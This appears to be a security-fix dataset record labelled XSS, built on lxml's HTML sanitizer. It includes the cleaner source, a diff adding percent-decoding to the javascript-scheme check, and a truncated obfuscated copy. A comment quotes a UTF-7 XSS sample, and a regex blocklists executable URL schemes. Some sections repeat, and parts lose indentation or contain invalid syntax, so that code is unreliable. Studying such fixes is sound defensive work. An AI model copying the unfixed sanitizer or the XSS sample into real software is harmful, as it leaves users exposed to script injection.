# Patterns recognising linkable text: http(s) URLs and mailto addresses.
# Each pattern must define 'body' and 'host' named groups.
_link_regexes = [
    re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
    # This is conservative, but autolinking can be a bit conservative:
    re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
    ]

# Elements whose text content should never be autolinked.
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']

# Hosts that should not be turned into links (local and example hosts).
_avoid_hosts = [
    re.compile(r'^localhost', re.I),
    re.compile(r'\bexample\.(?:com|org|net)$', re.I),
    re.compile(r'^127\.0\.0\.1$'),
    ]

# Elements with one of these classes are skipped by autolink().
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
             avoid_elements=_avoid_elements,
             avoid_hosts=_avoid_hosts,
             avoid_classes=_avoid_classes):
    """
    Turn any URLs into links.

    It will search for links identified by the given regular
    expressions (by default mailto and http(s) links).

    It won't link text in an element in avoid_elements, or an element
    with a class in avoid_classes.  It won't link to anything with a
    host that matches one of the regular expressions in avoid_hosts
    (default localhost and 127.0.0.1).

    If you pass in an element, the element's tail will not be
    substituted, only the contents of the element.
    """
    if el.tag in avoid_elements:
        return
    class_name = el.get('class')
    if class_name:
        class_name = class_name.split()
        for match_class in avoid_classes:
            if match_class in class_name:
                return
    # Recurse into children first; iterate over a snapshot because linking
    # a child's tail inserts new <a> siblings into `el` as we go.
    for child in list(el):
        autolink(child, link_regexes=link_regexes,
                 avoid_elements=avoid_elements,
                 avoid_hosts=avoid_hosts,
                 avoid_classes=avoid_classes)
        if child.tail:
            text, tail_children = _link_text(
                child.tail, link_regexes, avoid_hosts, factory=el.makeelement)
            if tail_children:
                # Remaining leading text stays as the child's tail; the new
                # anchors are spliced in directly after the child.
                child.tail = text
                index = el.index(child)
                el[index+1:index+1] = tail_children
    if el.text:
        text, pre_children = _link_text(
            el.text, link_regexes, avoid_hosts, factory=el.makeelement)
        if pre_children:
            # Anchors found in el.text become the first children of el.
            el.text = text
            el[:0] = pre_children
def _link_text(text, link_regexes, avoid_hosts, factory):
leading_text = ''
links = []
last_pos = 0
while 1:
best_match, best_pos = None, None
for regex in link_regexes:
regex_pos = last_pos
while 1:
match = regex.search(text, pos=regex_pos)
if match is None:
break
host = match.group('host')
for host_regex in avoid_hosts:
if host_regex.search(host):
regex_pos = match.end()
break
else:
break
if match is None:
continue
if best_pos is None or match.start() < best_pos:
best_match = match
best_pos = match.start()
if best_match is None:
# No more matches
if links:
assert not links[-1].tail
links[-1].tail = text
else:
assert not leading_text
leading_text = text
break
link = best_match.group(0)
end = best_match.end()
if link.endswith('.') or link.endswith(','):
# These punctuation marks shouldn't end a link
end -= 1
link = link[:-1]
prev_text = text[:best_match.start()]
if links:
assert not links[-1].tail
links[-1].tail = prev_text
else:
assert not leading_text
leading_text = prev_text
anchor = factory('a')
anchor.set('href', link)
body = best_match.group('body')
if not body:
body = link
if body.endswith('.') or body.endswith(','):
body = body[:-1]
anchor.text = body
links.append(anchor)
text = text[end:]
return leading_text, links
def autolink_html(html, *args, **kw):
    # Accept either markup (string) or an already-parsed document, run
    # autolink() on it, and hand back a result of the same type.
    input_type = type(html)
    if isinstance(html, basestring):
        doc = fromstring(html)
    else:
        doc = copy.deepcopy(html)
    autolink(doc, *args, **kw)
    return _transform_result(input_type, doc)

autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################

# Elements whose contents should never be word-broken.
_avoid_word_break_elements = ['pre', 'textarea', 'code']
# Elements with one of these classes are skipped by word_break().
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
               avoid_elements=_avoid_word_break_elements,
               avoid_classes=_avoid_word_break_classes,
               break_character=unichr(0x200b)):
    """
    Breaks any long words found in the body of the text (not attributes).

    Doesn't effect any of the tags in avoid_elements, by default
    ``<textarea>`` and ``<pre>``

    Breaks words by inserting &#8203;, which is a unicode character
    for Zero Width Space character.  This generally takes up no space
    in rendering, but does copy as a space, and in monospace contexts
    usually takes up space.

    See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion
    """
    # Character suggestion of &#8203; comes from:
    #   http://www.cs.tut.fi/~jkorpela/html/nobr.html
    #
    # Bug fix: honour the ``avoid_elements`` argument here; the original
    # always consulted the module-level default list, so callers passing
    # their own avoid_elements were silently ignored.
    if el.tag in avoid_elements:
        return
    class_name = el.get('class')
    if class_name:
        class_name = class_name.split()
        for avoid in avoid_classes:
            if avoid in class_name:
                return
    if el.text:
        el.text = _break_text(el.text, max_width, break_character)
    for child in el:
        word_break(child, max_width=max_width,
                   avoid_elements=avoid_elements,
                   avoid_classes=avoid_classes,
                   break_character=break_character)
        if child.tail:
            child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
    # Parse the markup, apply word_break(), and return the result in the
    # same type as the input.
    input_type = type(html)
    doc = fromstring(html)
    word_break(doc, *args, **kw)
    return _transform_result(input_type, doc)
def _break_text(text, max_width, break_character):
words = text.split()
for word in words:
if len(word) > max_width:
replacement = _insert_break(word, max_width, break_character)
text = text.replace(word, replacement)
return text
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
orig_word = word
result = ''
while len(word) > width:
start = word[:width]
breaks = list(_break_prefer_re.finditer(start))
if breaks:
last_break = breaks[-1]
# Only walk back up to 10 characters to find a nice break:
if last_break.end() > width-10:
# FIXME: should the break character be at the end of the
# chunk, or the beginning of the next chunk?
start = word[:last_break.end()]
result += start + break_character
word = word[len(start):]
result += word
return result
| """A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
import re
import copy
try:
from urlparse import urlsplit
from urllib import unquote_plus
except ImportError:
# Python 3
from urllib.parse import urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
bytes
except NameError:
# Python < 2.6
bytes = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
# Matches the IE-specific CSS expression() construct, which can run
# Javascript from inside a stylesheet.
_css_javascript_re = re.compile(
    r'expression\s*\(.*?\)', re.S|re.I)

# Do I have to worry about @\nimport?
# Matches CSS @import directives so they can be stripped out.
_css_import_re = re.compile(
    r'@\s*import', re.I)
# All kinds of schemes besides just javascript: that can cause
# execution:
_is_image_dataurl = re.compile(
r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def _is_javascript_scheme(s):
if _is_image_dataurl(s):
return None
return _is_possibly_malicious_scheme(s)
# Collapses whitespace and control characters; used to defeat
# "j a v a s c r i p t:"-style obfuscation before scheme checks.
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub

# FIXME: should data: be blocked?

# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx

# Matches the opening of an IE conditional comment, e.g. "[if IE 6]>".
_conditional_comment_re = re.compile(
    r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)

# All elements carrying an inline style attribute.
_find_styled_elements = etree.XPath(
    "descendant-or-self::*[@style]")

# All <a> elements (HTML or XHTML namespace) whose href is non-empty and
# does not start with "#", i.e. links that leave the current page.
_find_external_links = etree.XPath(
    ("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
     "descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
    namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
    """
    Instances cleans the document of each of the possible offending
    elements.  The cleaning is controlled by attributes; you can
    override attributes in a subclass, or set them in the constructor.

    ``scripts``:
        Removes any ``<script>`` tags.

    ``javascript``:
        Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
        as they could contain Javascript.

    ``comments``:
        Removes any comments.

    ``style``:
        Removes any style tags.

    ``inline_style``
        Removes any style attributes.  Defaults to the value of the ``style`` option.

    ``links``:
        Removes any ``<link>`` tags

    ``meta``:
        Removes any ``<meta>`` tags

    ``page_structure``:
        Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.

    ``processing_instructions``:
        Removes any processing instructions.

    ``embedded``:
        Removes any embedded objects (flash, iframes)

    ``frames``:
        Removes any frame-related tags

    ``forms``:
        Removes any form tags

    ``annoying_tags``:
        Tags that aren't *wrong*, but are annoying.  ``<blink>`` and ``<marquee>``

    ``remove_tags``:
        A list of tags to remove.  Only the tags will be removed,
        their content will get pulled up into the parent tag.

    ``kill_tags``:
        A list of tags to kill.  Killing also removes the tag's content,
        i.e. the whole subtree, not just the tag itself.

    ``allow_tags``:
        A list of tags to include (default include all).

    ``remove_unknown_tags``:
        Remove any tags that aren't standard parts of HTML.

    ``safe_attrs_only``:
        If true, only include 'safe' attributes (specifically the list
        from the feedparser HTML sanitisation web site).

    ``safe_attrs``:
        A set of attribute names to override the default list of attributes
        considered 'safe' (when safe_attrs_only=True).

    ``add_nofollow``:
        If true, then any <a> tags will have ``rel="nofollow"`` added to them.

    ``host_whitelist``:
        A list or set of hosts that you can use for embedded content
        (for content like ``<object>``, ``<link rel="stylesheet">``, etc).

        You can also implement/override the method
        ``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
        implement more complex rules for what can be embedded.
        Anything that passes this test will be shown, regardless of
        the value of (for instance) ``embedded``.

        Note that this parameter might not work as intended if you do not
        make the links absolute before doing the cleaning.

        Note that you may also need to set ``whitelist_tags``.

    ``whitelist_tags``:
        A set of tags that can be included with ``host_whitelist``.
        The default is ``iframe`` and ``embed``; you may wish to
        include other tags like ``script``, or you may want to
        implement ``allow_embedded_url`` for more control.  Set to None to
        include all tags.

    This modifies the document *in place*.
    """

    # Option defaults; see the class docstring for their meanings.
    scripts = True
    javascript = True
    comments = True
    style = False
    inline_style = None
    links = True
    meta = True
    page_structure = True
    processing_instructions = True
    embedded = True
    frames = True
    forms = True
    annoying_tags = True
    remove_tags = None
    allow_tags = None
    kill_tags = None
    remove_unknown_tags = True
    safe_attrs_only = True
    safe_attrs = defs.safe_attrs
    add_nofollow = False
    host_whitelist = ()
    whitelist_tags = set(['iframe', 'embed'])

    def __init__(self, **kw):
        # Reject typos in option names instead of silently ignoring them.
        for name, value in kw.items():
            if not hasattr(self, name):
                raise TypeError(
                    "Unknown parameter: %s=%r" % (name, value))
            setattr(self, name, value)
        if self.inline_style is None and 'inline_style' not in kw:
            # inline_style follows `style` unless set explicitly.
            self.inline_style = self.style

    # Used to lookup the primary URL for a given tag that is up for
    # removal:
    _tag_link_attrs = dict(
        script='src',
        link='href',
        # From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
        # From what I can tell, both attributes can contain a link:
        applet=['code', 'object'],
        iframe='src',
        embed='src',
        layer='src',
        # FIXME: there doesn't really seem like a general way to figure out what
        # links an <object> tag uses; links often go in <param> tags with values
        # that we don't really know.  You'd have to have knowledge about specific
        # kinds of plugins (probably keyed off classid), and match against those.
        ##object=?,
        # FIXME: not looking at the action currently, because it is more complex
        # than than -- if you keep the form, you should keep the form controls.
        ##form='action',
        a='href',
        )

    def __call__(self, doc):
        """
        Cleans the document.
        """
        if hasattr(doc, 'getroot'):
            # ElementTree instance, instead of an element
            doc = doc.getroot()
        # convert XHTML to HTML
        xhtml_to_html(doc)
        # Normalize a case that IE treats <image> like <img>, and that
        # can confuse either this step or later steps.
        for el in doc.iter('image'):
            el.tag = 'img'
        if not self.comments:
            # Of course, if we were going to kill comments anyway, we don't
            # need to worry about this
            self.kill_conditional_comments(doc)
        kill_tags = set(self.kill_tags or ())
        remove_tags = set(self.remove_tags or ())
        allow_tags = set(self.allow_tags or ())
        if self.scripts:
            kill_tags.add('script')
        if self.safe_attrs_only:
            safe_attrs = set(self.safe_attrs)
            for el in doc.iter(etree.Element):
                attrib = el.attrib
                for aname in attrib.keys():
                    if aname not in safe_attrs:
                        del attrib[aname]
        if self.javascript:
            if not (self.safe_attrs_only and
                    self.safe_attrs == defs.safe_attrs):
                # safe_attrs handles events attributes itself
                for el in doc.iter(etree.Element):
                    attrib = el.attrib
                    for aname in attrib.keys():
                        if aname.startswith('on'):
                            del attrib[aname]
            doc.rewrite_links(self._remove_javascript_link,
                              resolve_base_href=False)
            # If we're deleting style then we don't have to remove JS links
            # from styles, otherwise...
            if not self.inline_style:
                for el in _find_styled_elements(doc):
                    old = el.get('style')
                    new = _css_javascript_re.sub('', old)
                    new = _css_import_re.sub('', new)
                    if self._has_sneaky_javascript(new):
                        # Something tricky is going on...
                        del el.attrib['style']
                    elif new != old:
                        el.set('style', new)
            if not self.style:
                for el in list(doc.iter('style')):
                    if el.get('type', '').lower().strip() == 'text/javascript':
                        el.drop_tree()
                        continue
                    old = el.text or ''
                    new = _css_javascript_re.sub('', old)
                    # The imported CSS can do anything; we just can't allow:
                    # NOTE(review): 'old' (not 'new') is passed here, so the
                    # expression-stripping above is discarded; the sneaky-
                    # javascript check below still rejects 'expression(' —
                    # confirm intent before changing.
                    new = _css_import_re.sub('', old)
                    if self._has_sneaky_javascript(new):
                        # Something tricky is going on...
                        el.text = '/* deleted */'
                    elif new != old:
                        el.text = new
        if self.comments or self.processing_instructions:
            # FIXME: why either?  I feel like there's some obscure reason
            # because you can put PIs in comments...?  But I've already
            # forgotten it
            kill_tags.add(etree.Comment)
        if self.processing_instructions:
            kill_tags.add(etree.ProcessingInstruction)
        if self.style:
            kill_tags.add('style')
        if self.inline_style:
            etree.strip_attributes(doc, 'style')
        if self.links:
            kill_tags.add('link')
        elif self.style or self.javascript:
            # We must get rid of included stylesheets if Javascript is not
            # allowed, as you can put Javascript in them
            for el in list(doc.iter('link')):
                if 'stylesheet' in el.get('rel', '').lower():
                    # Note this kills alternate stylesheets as well
                    if not self.allow_element(el):
                        el.drop_tree()
        if self.meta:
            kill_tags.add('meta')
        if self.page_structure:
            remove_tags.update(('head', 'html', 'title'))
        if self.embedded:
            # FIXME: is <layer> really embedded?
            # We should get rid of any <param> tags not inside <applet>;
            # These are not really valid anyway.
            for el in list(doc.iter('param')):
                # NOTE(review): found_parent is never read after this.
                found_parent = False
                parent = el.getparent()
                while parent is not None and parent.tag not in ('applet', 'object'):
                    parent = parent.getparent()
                if parent is None:
                    el.drop_tree()
            kill_tags.update(('applet',))
            # The alternate contents that are in an iframe are a good fallback:
            remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
        if self.frames:
            # FIXME: ideally we should look at the frame links, but
            # generally frames don't mix properly with an HTML
            # fragment anyway.
            kill_tags.update(defs.frame_tags)
        if self.forms:
            remove_tags.add('form')
            kill_tags.update(('button', 'input', 'select', 'textarea'))
        if self.annoying_tags:
            remove_tags.update(('blink', 'marquee'))

        # Collect first, then mutate, so the tree is never modified while
        # being iterated.
        _remove = []
        _kill = []
        for el in doc.iter():
            if el.tag in kill_tags:
                if self.allow_element(el):
                    continue
                _kill.append(el)
            elif el.tag in remove_tags:
                if self.allow_element(el):
                    continue
                _remove.append(el)

        if _remove and _remove[0] == doc:
            # We have to drop the parent-most tag, which we can't
            # do.  Instead we'll rewrite it:
            el = _remove.pop(0)
            el.tag = 'div'
            el.attrib.clear()
        elif _kill and _kill[0] == doc:
            # We have to drop the parent-most element, which we can't
            # do.  Instead we'll clear it:
            el = _kill.pop(0)
            if el.tag != 'html':
                el.tag = 'div'
            el.clear()
        _kill.reverse() # start with innermost tags
        for el in _kill:
            el.drop_tree()
        for el in _remove:
            el.drop_tag()

        if self.remove_unknown_tags:
            if allow_tags:
                raise ValueError(
                    "It does not make sense to pass in both allow_tags and remove_unknown_tags")
            allow_tags = set(defs.tags)
        if allow_tags:
            bad = []
            for el in doc.iter():
                if el.tag not in allow_tags:
                    bad.append(el)
            if bad:
                if bad[0] is doc:
                    el = bad.pop(0)
                    el.tag = 'div'
                    el.attrib.clear()
                for el in bad:
                    el.drop_tag()
        if self.add_nofollow:
            for el in _find_external_links(doc):
                if not self.allow_follow(el):
                    rel = el.get('rel')
                    if rel:
                        if ('nofollow' in rel
                                and ' nofollow ' in (' %s ' % rel)):
                            continue
                        rel = '%s nofollow' % rel
                    else:
                        rel = 'nofollow'
                    el.set('rel', rel)

    def allow_follow(self, anchor):
        """
        Override to suppress rel="nofollow" on some anchors.
        """
        return False

    def allow_element(self, el):
        """
        Decide whether an element slated for removal may be kept.

        Only tags listed in ``_tag_link_attrs`` are candidates; the
        decision on each link attribute is delegated to
        ``allow_embedded_url()``.
        """
        if el.tag not in self._tag_link_attrs:
            return False
        attr = self._tag_link_attrs[el.tag]
        if isinstance(attr, (list, tuple)):
            # Every one of the attributes must be present and allowed.
            for one_attr in attr:
                url = el.get(one_attr)
                if not url:
                    return False
                if not self.allow_embedded_url(el, url):
                    return False
            return True
        else:
            url = el.get(attr)
            if not url:
                return False
            return self.allow_embedded_url(el, url)

    def allow_embedded_url(self, el, url):
        """
        Decide whether embedded content at *url* may be kept: only
        http(s) URLs on a whitelisted host, in a whitelisted tag.
        """
        if (self.whitelist_tags is not None
                and el.tag not in self.whitelist_tags):
            return False
        scheme, netloc, path, query, fragment = urlsplit(url)
        netloc = netloc.lower().split(':', 1)[0]
        if scheme not in ('http', 'https'):
            return False
        if netloc in self.host_whitelist:
            return True
        return False

    def kill_conditional_comments(self, doc):
        """
        IE conditional comments basically embed HTML that the parser
        doesn't normally see.  We can't allow anything like that, so
        we'll kill any comments that could be conditional.
        """
        # NOTE(review): 'bad' is unused here; _kill_elements collects its
        # own list.
        bad = []
        self._kill_elements(
            doc, lambda el: _conditional_comment_re.search(el.text),
            etree.Comment)

    def _kill_elements(self, doc, condition, iterate=None):
        # Collect matching elements first, then drop them, so the tree is
        # never mutated while being iterated.
        bad = []
        for el in doc.iter(iterate):
            if condition(el):
                bad.append(el)
        for el in bad:
            el.drop_tree()

    def _remove_javascript_link(self, link):
        # links like "j a v a s c r i p t:" might be interpreted in IE
        # unquote_plus() first, so percent-encoded scheme characters (e.g.
        # "java%73cript:") cannot smuggle a malicious scheme past the check.
        new = _substitute_whitespace('', unquote_plus(link))
        if _is_javascript_scheme(new):
            # FIXME: should this be None to delete?
            return ''
        return link

    _substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub

    def _has_sneaky_javascript(self, style):
        """
        Depending on the browser, stuff like ``e x p r e s s i o n(...)``
        can get interpreted, or ``expre/* stuff */ssion(...)``.  This
        checks for attempt to do stuff like this.

        Typically the response will be to kill the entire style; if you
        have just a bit of Javascript in the style another rule will catch
        that and remove only the Javascript from the style; this catches
        more sneaky attempts.
        """
        style = self._substitute_comments('', style)
        style = style.replace('\\', '')
        style = _substitute_whitespace('', style)
        style = style.lower()
        if 'javascript:' in style:
            return True
        if 'expression(' in style:
            return True
        return False

    def clean_html(self, html):
        """
        Clean an HTML string or parsed document, returning the cleaned
        markup in the same type as the input.
        """
        result_type = type(html)
        if isinstance(html, basestring):
            doc = fromstring(html)
        else:
            doc = copy.deepcopy(html)
        self(doc)
        return _transform_result(result_type, doc)
# A ready-made Cleaner with the default options, plus a module-level
# convenience alias for its clean_html() method.
clean = Cleaner()
clean_html = clean.clean_html


############################################################
## Autolinking
############################################################

# Patterns recognising linkable text: http(s) URLs and mailto addresses.
# Each pattern must define 'body' and 'host' named groups.
_link_regexes = [
    re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
    # This is conservative, but autolinking can be a bit conservative:
    re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
    ]

# Elements whose text content should never be autolinked.
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']

# Hosts that should not be turned into links (local and example hosts).
_avoid_hosts = [
    re.compile(r'^localhost', re.I),
    re.compile(r'\bexample\.(?:com|org|net)$', re.I),
    re.compile(r'^127\.0\.0\.1$'),
    ]

# Elements with one of these classes are skipped by autolink().
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
             avoid_elements=_avoid_elements,
             avoid_hosts=_avoid_hosts,
             avoid_classes=_avoid_classes):
    """
    Turn any URLs found in the text under *el* into ``<a>`` links.

    Links are identified by the given regular expressions (by default
    mailto and http(s) links).

    Text inside an element listed in *avoid_elements*, or inside an
    element carrying a class from *avoid_classes*, is left alone, as
    is any URL whose host matches one of the *avoid_hosts* patterns
    (default localhost and 127.0.0.1).

    If you pass in an element, the element's tail will not be
    substituted, only the contents of the element.
    """
    if el.tag in avoid_elements:
        return
    class_attr = el.get('class')
    if class_attr:
        classes = class_attr.split()
        for skip in avoid_classes:
            if skip in classes:
                return
    for child in list(el):
        # Recurse into the child first, then link any text trailing it.
        autolink(child, link_regexes=link_regexes,
                 avoid_elements=avoid_elements,
                 avoid_hosts=avoid_hosts,
                 avoid_classes=avoid_classes)
        if child.tail:
            remainder, new_anchors = _link_text(
                child.tail, link_regexes, avoid_hosts,
                factory=el.makeelement)
            if new_anchors:
                # The new anchors slot in right after the child.
                child.tail = remainder
                pos = el.index(child)
                el[pos + 1:pos + 1] = new_anchors
    if el.text:
        remainder, new_anchors = _link_text(
            el.text, link_regexes, avoid_hosts, factory=el.makeelement)
        if new_anchors:
            # Anchors made from leading text become the first children.
            el.text = remainder
            el[:0] = new_anchors
def _link_text(text, link_regexes, avoid_hosts, factory):
leading_text = ''
links = []
last_pos = 0
while 1:
best_match, best_pos = None, None
for regex in link_regexes:
regex_pos = last_pos
while 1:
match = regex.search(text, pos=regex_pos)
if match is None:
break
host = match.group('host')
for host_regex in avoid_hosts:
if host_regex.search(host):
regex_pos = match.end()
break
else:
break
if match is None:
continue
if best_pos is None or match.start() < best_pos:
best_match = match
best_pos = match.start()
if best_match is None:
# No more matches
if links:
assert not links[-1].tail
links[-1].tail = text
else:
assert not leading_text
leading_text = text
break
link = best_match.group(0)
end = best_match.end()
if link.endswith('.') or link.endswith(','):
# These punctuation marks shouldn't end a link
end -= 1
link = link[:-1]
prev_text = text[:best_match.start()]
if links:
assert not links[-1].tail
links[-1].tail = prev_text
else:
assert not leading_text
leading_text = prev_text
anchor = factory('a')
anchor.set('href', link)
body = best_match.group('body')
if not body:
body = link
if body.endswith('.') or body.endswith(','):
body = body[:-1]
anchor.text = body
links.append(anchor)
text = text[end:]
return leading_text, links
def autolink_html(html, *args, **kw):
    input_type = type(html)
    if isinstance(html, basestring):
        doc = fromstring(html)
    else:
        # Work on a copy so the caller's tree is left untouched.
        doc = copy.deepcopy(html)
    autolink(doc, *args, **kw)
    return _transform_result(input_type, doc)
# The string-accepting wrapper shares autolink()'s documentation.
autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################
# Elements whose text must never be word-broken (whitespace there is
# significant) and CSS classes that opt an element out.
_avoid_word_break_elements = ['pre', 'textarea', 'code']
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
               avoid_elements=_avoid_word_break_elements,
               avoid_classes=_avoid_word_break_classes,
               break_character=unichr(0x200b)):
    """
    Breaks any long words found in the body of the text (not attributes).

    Doesn't affect any of the tags in *avoid_elements*, by default
    ``<textarea>``, ``<pre>`` and ``<code>``, nor elements carrying a
    class from *avoid_classes* (default ``nobreak``).

    Breaks words by inserting &#8203;, which is the Unicode Zero Width
    Space character.  This generally takes up no space in rendering,
    but does copy as a space, and in monospace contexts usually takes
    up space.

    See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion
    """
    # Character suggestion of &#8203; comes from:
    # http://www.cs.tut.fi/~jkorpela/html/nobr.html

    # Bug fix: honour the avoid_elements parameter.  The original
    # consulted the module-level _avoid_word_break_elements here, so a
    # caller-supplied avoid list was silently ignored at the top level
    # (while still being passed down recursively).
    if el.tag in avoid_elements:
        return
    class_name = el.get('class')
    if class_name:
        dont_break = False
        class_name = class_name.split()
        for avoid in avoid_classes:
            if avoid in class_name:
                dont_break = True
                break
        if dont_break:
            return
    if el.text:
        el.text = _break_text(el.text, max_width, break_character)
    for child in el:
        word_break(child, max_width=max_width,
                   avoid_elements=avoid_elements,
                   avoid_classes=avoid_classes,
                   break_character=break_character)
        if child.tail:
            child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
    """Parse *html*, word-break its text with word_break(), and return
    the result in the same type as the input."""
    parsed = fromstring(html)
    word_break(parsed, *args, **kw)
    return _transform_result(type(html), parsed)
def _break_text(text, max_width, break_character):
words = text.split()
for word in words:
if len(word) > max_width:
replacement = _insert_break(word, max_width, break_character)
text = text.replace(word, replacement)
return text
# Prefer to break an overlong word right after a non-letter character
# (punctuation, digit) when one occurs near the chunk boundary.
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
    """Chop *word* into chunks of at most *width* characters, joined by
    *break_character*, preferring to break just after a non-letter."""
    pieces = []
    remaining = word
    while len(remaining) > width:
        chunk = remaining[:width]
        candidates = list(_break_prefer_re.finditer(chunk))
        if candidates:
            nicest = candidates[-1]
            # Only walk back up to 10 characters to find a nice break:
            if nicest.end() > width - 10:
                # FIXME: should the break character be at the end of the
                # chunk, or the beginning of the next chunk?
                chunk = remaining[:nicest.end()]
        pieces.append(chunk)
        remaining = remaining[len(chunk):]
    pieces.append(remaining)
    return break_character.join(pieces)
| xss | {
"code": [
" from urllib.parse import urlsplit",
" new = _substitute_whitespace('', link)"
],
"line_no": [
13,
485
]
} | {
"code": [
" from urllib import unquote_plus",
" from urllib.parse import urlsplit, unquote_plus",
" new = _substitute_whitespace('', unquote_plus(link))"
],
"line_no": [
11,
14,
486
]
} |
import re
import copy
try:
from urlparse import .urlsplit
except ImportError:
from urllib.parse import .urlsplit
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_69
except NameError:
VAR_69 = chr
try:
VAR_70
except NameError:
VAR_70 = str
try:
VAR_71
except NameError:
VAR_71 = str
try:
VAR_72
except NameError:
VAR_72 = (str, VAR_71)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_4*\(.*?\)', re.S|re.I)
VAR_1 = re.compile(
r'@\VAR_4*import', re.I)
VAR_2 = re.compile(
r'^data:image/.+;base64', re.I).search
VAR_3 = re.compile(
r'(?:VAR_33|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def FUNC_0(VAR_4):
if VAR_2(VAR_4):
return None
return VAR_3(VAR_4)
VAR_5 = re.compile(r'[\VAR_4\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_6 = re.compile(
r'\[if[\VAR_4\n\r]+.*?][\VAR_4\n\r]*>', re.I|re.S)
VAR_7 = etree.XPath(
"descendant-or-self::*[@VAR_35]")
VAR_8 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_32 = True
VAR_33 = True
VAR_34 = True
VAR_35 = False
VAR_36 = None
VAR_37 = True
VAR_38 = True
VAR_39 = True
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = None
VAR_46 = None
VAR_47 = None
VAR_48 = True
VAR_49 = True
VAR_50 = defs.safe_attrs
VAR_51 = False
VAR_52 = ()
VAR_53 = set(['iframe', 'embed'])
def __init__(self, **VAR_24):
for name, value in VAR_24.items():
if not hasattr(self, name):
raise TypeError(
"Unknown parameter: %VAR_4=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_24:
self.inline_style = self.style
VAR_54 = dict(
script='src',
VAR_60='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_55):
if hasattr(VAR_55, 'getroot'):
VAR_55 = VAR_55.getroot()
xhtml_to_html(VAR_55)
for VAR_15 in VAR_55.iter('image'):
VAR_15.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_55)
VAR_47 = set(self.kill_tags or ())
VAR_45 = set(self.remove_tags or ())
VAR_46 = set(self.allow_tags or ())
if self.scripts:
VAR_47.add('script')
if self.safe_attrs_only:
VAR_50 = set(self.safe_attrs)
